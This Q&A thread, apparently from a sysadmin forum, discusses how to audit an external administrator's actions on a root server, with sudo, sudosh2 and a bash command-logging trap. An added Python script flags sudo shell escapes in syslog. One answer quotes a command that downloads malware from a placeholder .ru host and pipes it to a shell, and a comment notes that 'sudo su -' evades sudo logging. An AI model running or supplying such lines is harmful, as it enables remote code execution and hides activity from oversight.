
I want to give access to my root server to an external system administrator, but I want to be sure to double check what he is doing to my server, e.g. copying data I don't want them to do and so on. I would also like to keep track of whatever file is accessed, even in read only and not edited.

How can I do that?

cedivad

3 Answers


Don't give him root access. Instead, give him an un-privileged user account and request that he do all of his work through sudo, which will log all of his commands.

Keep in mind that if this person has ill intentions and you give him full sudo privileges, he will find a way to carry out those ill intentions without those commands being logged. In this case, only grant him access to the specific commands he needs to do his job.

EEAA
  • I want to make it as hard as possible without making my life a pain. Thanks for the answer. – cedivad Apr 10 '12 at 22:35
  • You can just run `sudo su -` and have a root shell that won't be logged (except that you started it). This is what I normally type when I want to do more than a single command as root in one go, or if I want tab completion in directories normal users can't read. – rjmunro Apr 11 '12 at 23:53
  • @rjmunro - Which is exactly why I issued the caveat of only giving him the specific access he needs. You can explicitly forbid `sudo su -` if desired. – EEAA Apr 12 '12 at 00:22
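A check a defender can run over sudo's syslog output to spot the point where the per-command audit trail described above stops, as an added example that is not part of this thread. It assumes sudo's default syslog record layout (`user : TTY=... ; PWD=... ; USER=... ; COMMAND=...`); the log lines are constructed for the example.

```python
import re

# sudo's default syslog record: one line per invocation. The optional
# TTY field is absent when sudo is run without a terminal.
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s*:\s*"
    r"(?:TTY=(?P<tty>\S+)\s*;\s*)?"
    r"PWD=(?P<pwd>\S+)\s*;\s*"
    r"USER=(?P<runas>\S+)\s*;\s*"
    r"COMMAND=(?P<command>.*)$"
)

# Programs that hand the admin an interactive shell: once one of these
# runs via sudo, sudo's own log records nothing further for that session.
SHELL_LIKE = {"su", "sh", "bash", "dash", "zsh", "ksh", "csh", "tcsh"}

# Constructed sample log (not real data): two normal commands, two shell
# escapes, and one unrelated syslog line that must be ignored.
SAMPLE_LOG = """\
Apr 10 22:35:01 host sudo:   admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/sbin/service nginx restart
Apr 10 22:36:12 host sudo:   admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/bin/su -
Apr 10 22:40:44 host sudo:   admin : TTY=pts/1 ; PWD=/var/log ; USER=root ; COMMAND=/bin/bash -l
Apr 10 22:41:02 host sudo:   admin : TTY=pts/1 ; PWD=/var/log ; USER=root ; COMMAND=/usr/bin/tail -n 50 /var/log/syslog
Apr 10 22:42:30 host CRON[1234]: (root) CMD (run-parts /etc/cron.hourly)
"""

def parse_sudo_line(line):
    """Return the fields of a sudo command record, or None for any other syslog line."""
    m = SUDO_RE.search(line)
    return m.groupdict() if m else None

def is_shell_escape(command):
    """True if the program sudo ran is itself a shell (or su), ending sudo's command-level audit."""
    argv = command.split()
    if not argv:
        return False
    prog = argv[0].rsplit("/", 1)[-1]   # basename, so /bin/bash and bash match alike
    return prog in SHELL_LIKE

def find_shell_escapes(log_text):
    """Return (user, tty, command) for every sudo record that opened an unaudited shell."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_sudo_line(line)
        if rec and is_shell_escape(rec["command"]):
            hits.append((rec["user"], rec["tty"], rec["command"]))
    return hits

if __name__ == "__main__":
    for user, tty, cmd in find_shell_escapes(SAMPLE_LOG):
        print(f"unaudited shell opened by {user} on {tty}: {cmd}")
```

Each hit marks the moment from which only a session recorder such as sudosh2 (or a restricted sudoers command list) can show what was done.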

Trust, but verify!

Check out sudosh2. sudosh2 is provided by FreeBSD ports. Packages are available for RedHat and Ubuntu. Here is the description from their website:

sudosh is an auditing shell filter and can be used as a login shell. Sudosh records all keystrokes and output and can play back the session just like a VCR.

Sudosh will allow you to replay the user's session, which will allow you to see all input and output as the user saw it. You see everything, keystrokes, typos, backspaces, what did they edit in vi, the output of wget -O- http://zyxzyxzyxzyx.ru/haxor/malware | /bin/sh, etc.

It's possible to send sudosh logs to syslog, so that they can be stored on a central syslog server away from the system.

Note that sudosh2 is a replacement for sudosh, which was abandoned by its author.

Do you work at an academic institution where users insist on having superuser privileges? Or do you work at a corporation and want to allow users to have superuser privileges on their own VMs? This might be the solution for you.

Stefan Lasiewski

I'm not familiar with sudosh2, but I put the following in my .bashrc to log all the commands I type in a bash shell to the file ~/.command_log:

# log every command typed and when
if [ -n "${BASH_VERSION}" ]; then
    trap "caller >/dev/null || \
printf '%s\\n' \"\$(date '+%Y-%m-%dT%H:%M:%S%z')\
 \$(tty) \${BASH_COMMAND}\" 2>/dev/null >>~/.command_log" DEBUG
fi

The above sets a trap on DEBUG, which is executed just before an ordinary command is executed. The caller built-in is used to test whether the command is being typed at an interactive shell or run via something like .bashrc. The value ${BASH_COMMAND} contains the command currently being executed.

Richard Hansen